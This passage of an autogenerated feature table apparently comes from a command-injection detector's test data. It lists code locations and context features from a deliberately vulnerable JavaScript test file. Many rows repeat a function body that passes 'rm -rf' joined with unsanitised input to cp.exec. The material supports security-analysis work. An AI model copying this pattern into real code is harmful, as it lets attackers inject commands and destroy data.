autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | exceptional return of args1.push(name) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:2:86:17 | exceptional return of args1.push(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:8:86:11 | push | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:8:86:11 | push | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:8:86:11 | push | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:8:86:11 | push | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:8:86:11 | push | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:13:86:16 | name | CalleeFlexibleAccessPath | args1.push | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:13:86:16 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:13:86:16 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:13:86:16 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:13:86:16 | name | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:13:86:16 | name | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:13:86:16 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:86:13:86:16 | name | receiverName | args1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:3 | cp | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:3 | cp | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:8 | cp.exec | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | cp.exec ... n(" ")) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | exceptional return of cp.exec ... n(" ")) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | exceptional return of cp.exec ... n(" ")) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | exceptional return of cp.exec ... n(" ")) | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | exceptional return of cp.exec ... n(" ")) | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:2:87:25 | exceptional return of cp.exec ... n(" ")) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:5:87:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:5:87:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:5:87:8 | exec | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:5:87:8 | exec | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:5:87:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:14 | args1 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:14 | args1 | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:14 | args1 | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:14 | args1 | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:14 | args1 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:19 | args1.join | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:19 | args1.join | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:19 | args1.join | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:19 | args1.join | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:19 | args1.join | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | args1.join(" ") | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | exceptional return of args1.join(" ") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | exceptional return of args1.join(" ") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | exceptional return of args1.join(" ") | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | exceptional return of args1.join(" ") | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:10:87:24 | exceptional return of args1.join(" ") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:16:87:19 | join | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:16:87:19 | join | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:16:87:19 | join | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:16:87:19 | join | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:16:87:19 | join | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:21:87:23 | " " | CalleeFlexibleAccessPath | args1.join | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:21:87:23 | " " | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:21:87:23 | " " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:21:87:23 | " " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:21:87:23 | " " | enclosingFunctionBody | name cp exec rm -rf name args1 node args1 push name cp exec args1 join cp exec rm -rf name join cp exec rm -rf " name " join cp execFile rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:21:87:23 | " " | enclosingFunctionName | arrays | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:21:87:23 | " " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:87:21:87:23 | " " | receiverName | args1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:89:2:89:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| 